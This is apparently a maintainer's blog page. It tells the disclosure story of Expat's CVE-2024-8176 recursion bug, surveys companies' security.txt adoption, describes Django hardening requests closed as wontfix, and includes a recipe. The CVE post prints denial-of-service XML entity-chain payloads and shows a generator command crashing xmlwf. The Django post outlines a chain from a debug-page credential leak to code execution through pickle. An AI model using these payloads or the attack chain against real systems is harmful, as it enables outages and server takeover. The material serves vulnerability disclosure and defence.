Recursion kills: The story behind CVE-2024-8176 / Expat 2.7.0 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.7.0 has been released earlier today. I will make this a more detailed post than usual because in many ways there is more to tell about this release than the average libexpat release: there is a story this time.
What is in release 2.7.0?
The key motivation for cutting a release now is to get the fix to a long-standing vulnerability out to users: I will get to that vulnerability — CVE-2024-8176 — in detail in a moment. First, what else is in this release?
There are also fixes to the two official build systems as usual, as well as improvements to the documentation.
There is a new fuzzer xml_lpm_fuzzer
by Mark Brand
that OSS-Fuzz has already started to include with their daily
continuous fuzzing;
the fuzzer is based on
Clang's libFuzzer and
Google's libprotobuf-mutator (LPM) that
applies a variant of
coverage-guided fuzzing called
structured fuzzing.
A side job of integrating that new fuzzer was making dependency libprotobuf-mutator support
the versions of Protobuf that are shipped by Ubuntu 24.04, 22.04 and 20.04:
my related work upstream
is available to everyone.
Another interesting sideshow of this release is the (harmless) TOCTTOU issue that was uncovered by static analysis in a benchmarking helper tool shipped next to core libexpat. If you have not heard of that class of race condition vulnerability but are curious, the related pull request could be of interest: it is textbook TOCTTOU in a real-world example.
One other thing that is new in this release is that Windows binaries are now built by GitHub Actions rather than AppVeyor and not just 32bit but also 64bit. I have added 64bit binaries post-release to the previous release Expat 2.6.4 already on January 21st, but only now it is becoming a regular part of the release process.
The vulnerability report
So what is that long-standing vulnerability about? In July 2022 — roughly two and a half years ago — Jann Horn of Google Project Zero and Spectre/Meltdown fame reached out to me via e-mail with a finding in libexpat, including an idea for a fix.
What he found can be thought of as "the linear version of billion laughs" — a linear chain (of so-called general entities) rather than a tree — like this:
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc>&g2;</doc>
Except not with two (or three) levels, but thousands. Why would a chain of thousands of entity references be a problem to libexpat? Because of recursion, because of recursive C function calls: each call to a function increases the stack, and if functions are calling each other recursively, and attacker-controlled input can influence the number of recursive calls, then with the right input, attackers can force the stack to overflow into the heap: stack overflow, segmentation fault, denial of service. It depends on the stack size of the target machine how many levels of nesting it takes for this to hit: 23,000 levels of nesting would be enough to hit on one machine, but not another.
The education that introduces or leads people towards recursion should come with a warning; recursion is not just beautiful, a thinking tool and allowing for often simpler solutions — it also has a dark side to it: a big inherent security problem. The article The Power of 10: Rules for Developing Safety-Critical Code warned about the use of recursion in 2006, but Expat development already started in 1997.
Already in that initial e-mail, Jann shared what he considered the fix — avoiding (or resolving) recursion — and there was a proof-of-concept patch attached of how that could be done in general. Unlike other Project Zero findings, there would be no 90-days-deadline for this issue, because — while stack clashing was considered and is a theoretical possibility — denial of service was considered to be the realistic impact. It should be noted that this risk assessment comes without any guarantees.
The vulnerability process
Two things became apparent to me:
- It seemed likely that this vulnerability had multiple "faces" or variants, and that the only true fix would indeed be to effectively remove all remaining recursion from Expat. It is not the first time that recursion has been an issue in C software, or even libexpat in particular: Samanta Navarro resolved vulnerable recursion in a different place in libexpat code in February 2022 already. Thanks again!
- That it would be a pile of work, not a good match to my unpaid voluntary role in Expat as an addition to my unrelated-to-Expat day job, and not without risk without a partner at detail level on the topic. My prior work on fixing billion laughs for Expat 2.4.0 made me expect this to be similar, but bigger.
And with that expectation, the issue started aging without a fix, and in some sense, I felt paralyzed about the topic and kept procrastinating about it for a long time. Every now and the topic came up with my friend, journalist and security researcher Hanno Böck whom I had shared the issue with. He was arguing that even without a fix, the issue should be made public at some point.
One reason why I was objecting to publication without a fix was that it was clear that in lack of a cheap clean fix, vendors and distributions would start applying quick hacks that would produce false positives (i.e. rejecting well-formed benign XML misclassified as an attack), leave half of the issue unfixed, and leave the ecosystem with a potentially heterogeneous state of downstream patches where — say — in openSUSE a file would be rejected but in Debian it would parse fine — or the other way around: a great mess.
I eventually concluded that the vulnerability could not keep sitting in my inbox unfixed for another year, that it needed a fix before publication to not cause a mess, and that I had to take action.
Reaching out to companies for help
In early 2024, I started considering ways of finding help more, and added a call for help banner to the change log that was included with Expat 2.6.2. I started drafting an e-mail that I would send out to companies known to use libexpat in hardware. I had started maintaining a (by no means complete) public list of companies using Expat in hardware that now came in handy.
On April 14th, 2024 I started finding looking for security
contacts for companies on that list.
For some, it was easy to find and for others, I gave up eventually;
for some, I am still not sure whether I got the right address
or whether they are ghosting me as part of an ostrich policy.
I wish more companies would start serving /.well-known/security.txt
;
finding vulnerability report contacts is still actual work in 2025 and should not be.
So then I mailed to circa 40 companies using a template, like this:
Hello ${company}, this e-mail is about ${company} product IT security. Are you the right contact for that? If not please forward it to the responsible contact within ${company} — thank you! On the security matter: It has come to my attention that ${company} products and business rely on libexpat or the "Expat" XML parser library, e.g. product ${product} is using libexpat according to document [1]. I am contacting you as the maintainer of libexpat and its most active contributor for the last 8 years, as can be seen at [2]; I am reaching out to you today to raise awareness that: - All but the latest release of libexpat (2.6.2) have security issues known to the public, so every product using older versions of libexpat can be attacked through vulnerable versions of libexpat. - Both automated fuzzing [3] and reports from security researchers keep uncovering vulnerabilities in libexpat, so it needs a process of updating the copy of libexpat that you bundle and ship with your products, if not already present. - My time on libexpat is unfunded and limited, and there is no one but me to constantly work on libexpat security and to also progress on bigger lower priority tasks in libexpat. - There is a non-public complex-to-fix security issue in libexpat that I have not been able to fix alone in my spare time for months now, that some attackers may have managed to find themselves and be actively exploiting today. I need partners in fixing that vulnerability. Can ${company} be a partner in fixing that vulnerability, so that your products using libexpat will be secure to use in the future? I am looking forward to your reply, best Sebastian Pipping Maintainer of libexpat [1] ${product_open_source_copyright_pdf_url} [2] https://github.com/libexpat/libexpat/graphs/contributors [3] https://en.wikipedia.org/wiki/Fuzzing
Replies are coming in
The responses I got from companies were all over the map:
-
My "favorite" reply was "We cannot understand what you want from us" when everyone else had understood me just fine. Nice!
-
Though that competes with the reply "A patch will be released after the fall." when they had not received any details from me. Okay!
-
There was arguing that the example product that I had mentioned was no longer receiving updates (rather than addressing their affected other products that are not end-of-life and continue to use libexpat).
-
I was asked to prove a concrete attack on the company's products (which would not scale, need access to the actual product, etc).
-
That they "do not have sufficient resources to assist you on this matter even if libexpat is employed in some of .....'s products" came back a few times.
It was interesting and fun in some sense, and not fun in another.
Next stop: confidentiality
What came next was that I asked companies to sign a simple freeform
NDA with me.
Companies were not prepared for that. Why was I asking for an NDA and
TLP:RED
?
To (1) make sure that who got the details would need to collaborate
on a true fix and not just monkey-patch their own setups and (2)
to avoid the scenario of heterogeneous trouble fixes
that I mentioned before
that would have been likely in case of a leak before there was a true fix.
Some discussions failed at NDA stage already, while others survived and continued to video calls with me explaining Jann's findings in detail.
It is worth noting that I knew going in that many vulnerability reward programs exclude the whole class of denial of service and so I tied sharing the expected impact to signing an NDA to reduce the chances of everyone discarding it "Oh 'just' denial of service, we'll pass".
The eventual team and security work
Simplifying a bit, I found two main partner companies in this: Siemens and a company that would not like to be named, let's call them "Unnamed Company". Siemens started development towards a candidate fix, and Unnamed Company started evaluating options of what other companies they could pay to help for them, which got Linutronix and also Red Hat involved.
Siemens took the builder role while Linutronix, Red Hat and I provided quality assurance of various kinds. While we did not work day and night, it is fair to say that we have been working on the issue since May 2024 — for about 10 months.
The three faces of the vulnerability
It did indeed turn out that the vulnerability has multiple — three — faces:
1. General entities in character data
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc>&g2;</doc>
2. General entities in attribute values
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc key='&g2;'/>
3. Parameter entities
<!DOCTYPE doc [ <!ENTITY % p0 ''> <!ENTITY % p1 '%p0;'> <!ENTITY % p2 '%p1;'> <!ENTITY % define_g0 "<!ENTITY g0 '%p2;'>"> %define_g0; ]> <doc/>
The third variant "Parameter entities" reuses ideas from my 2021 exploit for vulnerability Parameter Laughs (CVE-2021-3541): It used the same mechanism of delayed interpretation.
There are three related parameterized attack payload generators in Python available; use should be straighforward:
# python3 payload3.py --help | head -n1 usage: payload3.py [-h] [count] # python3 payload3.py 4 <!DOCTYPE doc [ <!ENTITY % p0 ''> <!ENTITY % p1 '%p0;'> <!ENTITY % p2 '%p1;'> <!ENTITY % p3 '%p2;'> <!ENTITY % p4 '%p3;'> <!ENTITY % define_g0 "<!ENTITY g0 '%p4;'>"> %define_g0; ]> <doc/> # python3 payload3.py | xmlwf -p -r /dev/stdin Segmentation fault
Please use attack payload responsibly!
Conclusions and gratitude
It is no overstatement to say that without Berkay Eren Ürün — the main author of the fix — and his manager Dr. Thomas Pröll at Siemens there would be no fix today: a big and personal "thank you!" from me.
Thanks to Unnamed Company, to Linutronix, to Red Hat for your help making this plane fly!
Thanks to Jann Horn for his whitehat research and the demo patch that lead the path to a fix!
Thanks to everyone who contributed to this release of Expat!
And please tell your friends:
Please leave recursion to math and keep it out of (in particular C) software: it kills and will kill again.
Kind regards from libexpat, see CVE-2022-25313 and CVE-2024-8176 for proof.
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.7.0. Thank you!
Sebastian Pipping
Most IT companies fail to serve security.txt for RFC 9116 in 2025
I happen to maintain a public list of companies using libexpat in hardware, though not complete by any means. Last time I tried mass-mailing companies about a security issue in April 2024. Finding the right contact for security was non-trivial and even failed in some cases. E.g. for Humax Digital I eventually gave up.
It is needless to say that if your security contacts are too hard to find, that says something about how urgently you want to fix security issues (or not).
So I felt like re-checking how many of these 50 companies are serving
/.well-known/security.txt
(or the significantly less common /security.txt
)
a la RFC 9116 in 2025.
The sad answer is: 39 out of the 50 companies I tested do not, i.e. 78%. Here's who and where exactly I tested:
- ✅ Bosch
- ❌ Brother
- ❌ BSH Hausgeräte
- ❌ Casio
- ✅ Cisco
- ✅ Dell
- ❌ Denon
- ❌ Domino Printing
- ❌ eQ-3
- ❌ Ford
- ❌ Harman
- ❌ HP
- ❌ Humax Digital
- ❌ Intel
- ❌ Intermec
- ❌ Kathrein Digital Systems
- ❌ Kyocera
- ❌ Lantronix
- ❌ LG
- ❌ marantz
- ❌ Mazda
- ✅ Mercedes-Benz
- ❌ NetApp
- ❌ Onkyo
- ❌ Palm
- ❌ Panasonic
- ❌ Ricoh
- ❌ Romi
- ✅ Rohde & Schwarz
- ❌ Sangoma
- ✅ Siemens
- ❌ Sharp
- ✅ SMA
- ❌ Sony
- ❌ STIHL
- ❌ TCS
- ❌ Teac
- ❌ TechniSat
- ❌ Telekom
- ❌ Theben
- ❌ Timemaster
- ✅ Trend Micro
- ❌ Universal Audio
- ❌ VacuuBrand
- ❌ Verizon
- ✅ Vodafone
- ❌ X-Rite
- ❌ Yamaha
- ✅ Yokogawa
- ✅ Zyxel
If you work at a company that does not serve /.well-known/security.txt
yet,
please fix it or share a link to https://securitytxt.org/
with a co-worker or management of yours so they can — thank you!
How to help an Open Source project that your company depends on
I'm in touch with a company that is trying to figure out how to best help specific Open Source projects that they depend on (i.e. that are part of their SBOM). I'll do something unusual for me today, and do a public braindumb on the topic, and adjust these notes over time. Let's dive right in:
Why help Open Source in the first place?
Benefits of helping the Open Source projects that you depend on include that:
- your software dependency is more likely to stay in good enough shape to fix vulnerabilities and release security fixes with little delay, and that increases your own products security
- you avoid a "riding a dead horse" situation without knowing
- you get organic marketing (brand visibility, value signaling, attention from potential hires, ..)
- you get a feel of being part of the solution
- you build relationships for the future
What state does the project need to be in to be considered healthy?
Project health has many aspects, some less obvious, in particular to non-developers. All aspects of project help offer unique opportunities to be helpful.
To be a healthy dependency, you want the following future state for the project (in no particular order):
- maintainable and secure code,
- maintainable build system,
- tests and good test coverage (to avoid bugs and regressions),
- secure CI pipeline running the tests (to avoid regression),
- static analysis in CI (to reduce introduction of bugs),
- runtime analysis (to reduce introduction of bugs) e.g. use of AddressSanitizer and UndefinedBehaviorSanitizer with C/C++ projects,
- code auto-formatting and checks for formatting violations in CI (for readability, morale, efficiency of review),
- support for recent toolchains (e.g. recent compilers, for agility and morale),
- (no support for ancient toolchains (for agility and morale),)
- an all-warnings-addressed situation
(e.g. using
-Werror -Wno-error=...
in CI (but not in packaging) for C/C++ code) or actively working towards reducing the list of explicit exclusions for all static analysis tools in use, - collaborative attitude among project contributors,
- low number of stuck issues (for morale and efficiency),
- low number of stuck pull requests (for morale and efficiency),
- timely, thorough, co-operative code review for pull requests (for morale and progress),
- timely and co-operative responses, analysis, discussion in issues (for morale and progress),
- integrated use of fuzzing (to detect unknown vulnerabilities) with good fuzzing code coverage (upstream and/or in OSS-Fuzz).
How to fund help in general?
There are multiple options:
- a) pay existing hands upstream (through funding or employment) that are open to direct funding
- b) bring new hands that you already pay for (e.g. through ongoing employment)
- c) bring new hands that you will pay for
- d) combinations of (a), (b) and/or (c)
- e) pay a third party to organize (d) for you well
Every project is unique in the needs: some maintainers are happy to spend more of their own time for compensation, others are already at their limit of spending time, need self-organizing additional hands, have no use for payment at all, and so on. Finding the approach that works for a specific project through analysis and discussion is key.
What are the challenges in funding a project?
- Paying contributors can get them into situations of conflict of interests.
- Paying contributors can create an atmosphere of envy and injustice.
- Paying contributors can become tricky legally when they work on the project during both work hours and spare time, e.g. with regard to legal maximum de-facto work hours per day.
- Paying existing contributors can affect their motivation to work on the project for better or worse.
- Paying existing contributors on project A can make them neglect other important duties, e.g. work on project B.
- Producing more (or too many) non-trivial pull requests takes away time from existing contributors (and can hence hurt more than help).
- Some contributors like to avoid voice/video calls and some like to avoid text ping-pong, i.e. individual needs need individual approaches.
What can be done about these challenges?
Some ideas about how to tackle these challenges:
- For (1) communicate (and mean) that you understand and expect that their conscience, ethical behavior and the community interests of the project are at least as important as your business interest.
- For (2) consider approaching the whole project on the topic of funded contributions before starting to fund.
- For (3) discuss the issue with funded contributors upfront.
- For (4) discuss the topic with funded contributors upfront, to get a sense for the kind of affect you would have.
- For (5) discuss their situation in life and other duties with them before funding.
- For (6) discuss with existing contributors:
- how to maximize pull requests for reviewability to their eyes,
- how much volume or pace of contribution they can sustainably handle at the moment,
- whether voice/video calls or text ping-pong fits there individual needs better, and
- which issues (or types of issues) to start helping with and which issues to not touch at the moment.
- For (7) discuss with existing contributors.
Take home points
- It can be done.
- Every project has different needs.
- There are plenty of things that projects need help with.
- Doing it wrong can hurt a project and make matters worse.
- You have a unique profile what kind of help fits you best.
- Tip: You can bookmark this page to find your way back here easily later.
Did any of that hit a nerve with you or made no sense at all?
Let me know and have a nice day!
(German) Heiße Haferflocken mit Apfel und Zimt
Hintergrund
In meiner Kindheit hat meine Mam dieses Gericht oft vor der Schule für uns Kinder als Frühstück zubereitet. Eine tolle kleine Mahlzeit, die schnell und treffsicher gelingt.
Zutaten (für 1 Person oder Portion)
- 250 ml Vollmilch (mit 3,x % Fett)
- 6 (leicht gehäufte) Esslöffel grobe Haferflocken
- 1 Teelöffel (feiner weißer) Zucker
- 1 Apfel (am besten: Sorte Elstar)
- Zimt
Zubereitung
- Den Apfel mit einer groben Reibe reiben und als "Heuhaufen" in der Mitte eines tiefen Tellers aufbauen.
- Den Berg Apfel großzügig mit Zimt bestreuen.
- Die Haferflocken, Milch und den Zucker in einen Topf geben und bei mittlere Hitze auf den Herd stellen.
- Mit einem Esslöffel kontinuierlich rühren und immer mal wieder kurz pausieren, nur um nicht durch das Rühren den Anfang vom Kochen — mit sichtbarer Blasenbildung — zu verpassen.
- Sobald die Milch beginnt zu kochen, den Topf vom Herd nehmen und die Milch-Haferflocken-Suppe um den Apfelberg herum verteilen.
- Fertig.
Happy new year! / Fwd: Robyn 'Get Myself Together'
Django security hardenings that are not happening
The story behind it
I was pointed to a vulnerable Django setup not too long ago, and had a closer look. Their setup would have allowed potential arbitrary remote code execution through this combination of configurations, with emphasis on combination:
- They were using a Redis database that listens to the public internet for both a Django Celery Queue and a Django cache. With the right credentials, an attacker could talk to the database directly.
- They had Redis credentials — user and password — in the
CELERY_BROKER_URL
Django setting (which is not uncommon with Celery). - Django's
default
SafeExceptionReporterFilter
does not cleanse setting keyCELERY_BROKER_URL
, and so Django's debug mode revealsCELERY_BROKER_URL
content including credentials on server errors. - They had Debug mode enabled by mistake and without knowing, more on how that was possible below.
- They had a Django view that could be forced to crash to then reveal the debug error page.
- Django would un
pickle
anything that an attacker puts into the Redis cache after takeover and thus run attacker code throughpickle
as known for years.
In isolation, none of these cause as big of a problem, but combined
things get scary; looking at that same picture from the opposite side,
fixing any single of these parts would have closed the attack vector as
whole. The affected setup has part (4) fixed now, the
related pull request
is public.
It's a good reminder that in Python both bool('False')
and bool('0')
evaluate to True
even when it feels wrong in some way.
What about closing some of these open doors for everyone and by default, wouldn't that be nice?
Trying to close these open doors by default in Django
Regarding (2) and (3), the CELERY_BROKER_URL
issue with
SafeExceptionReporterFilter
is something that I already
reported over five years ago
but it's easy to argue that never activating debug mode is the only true fix
(and that's not wrong but also doesn't help the situation)
and so it was closed as "wontfix" then, and again this year when I wanted
to give it another shot with a
pull request
when it became clear again to be a killer in practice.
Regarding (4), the debug mode that was enabled by accident could have
been prevented by Django limiting settings.DEBUG
to instances of bool
(or by disallowing string values like
"off"
, "no"
, "0"
, "disabled"
, "false"
, "False"
except the latter approach does not scale well beyond English if that matters).
It can always be argued that we cannot protect all users from themselves
and that this is beyond the line of user responsibility,
but it would have saved that particular setup.
The issue was closed as "wontfix".
Regarding (6), making use of pickle
in caching secure by wrapping it with a
layer of did-we-pickle-this-ourself-earlier protection will cost some
performance (which is yet to be proven critical), but it would make a good
secure default and something that only those users should turn off in order
to re-gain the lost performance who understand their threat model well and
whether it's really okay to own all of Django when the cache database
gets owned.
It was closed as "wontfix".
Because I had one more hardening issue to report that keeps coming up in
the wild, I filed one more issue for the security-by-obscurity issue with
/static/staticfiles.json
where attackers can learn about your Django
dependencies, their precise versions and get new ideas for targetted attacks
from that, in particular with setups missing security updates
(which is the true issue to be fixed in the setup, indeed).
Almost everyone starts hiding that file once made aware of the implications but
the issue was closed as "wontfix".
Four hardening issues closed as "wontfix" felt like an unfortunate pattern to me — I knew "wontfix" as an exception only, even outside of security — so I reached out to the Django security team via e-mail to be sure they were in support of these "wontfix"es and that this was not just one big misunderstanding. They are in support of it and me investing more time in discussions on the forums is their wished way forward, too. So not a misunderstanding.
I have decided to direct my time and energy elsewhere, to rather blog about it here in order to raise awareness about these issues before these doors are closed by default. I also have some hope (just a tiny bit) that maybe one of my readers — could be you — wants to be the force to advance these topics in the Django forums.
Bonus track
Regarding (5), the particular crash I found was interesting.
EmailField
comes with max_length=254
by default and so if you have API endpoints
that ask for well-formed e-mail-addresses and store them into the database
without length validation, passing a too-long-but-well-formed e-mail address
may allow crashing view code (at database entrance) that looks perfectly
healthy at first but doesn't do enough for
validating objects.
Stay secure, and have a nice day!
Sebastian Pipping
Fwd: Seth Godin: Stop Waiting for Permission!
Fwd: Simon Sinek & Trevor Noah on Friendship
Expat 2.6.3 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.6.3 has been released earlier today. The key motivation for cutting a release and cutting it now are the three security findings by TaiYou that were assigned identifiers CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.
Out of the remaining bunch of fixes in and around the build system, the BSD-motivated portability contributions by Dag-Erling Smørgrav stand out with this release. Thanks to everyone who contributed to this release of Expat!
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.6.3. Thank you!
Sebastian Pipping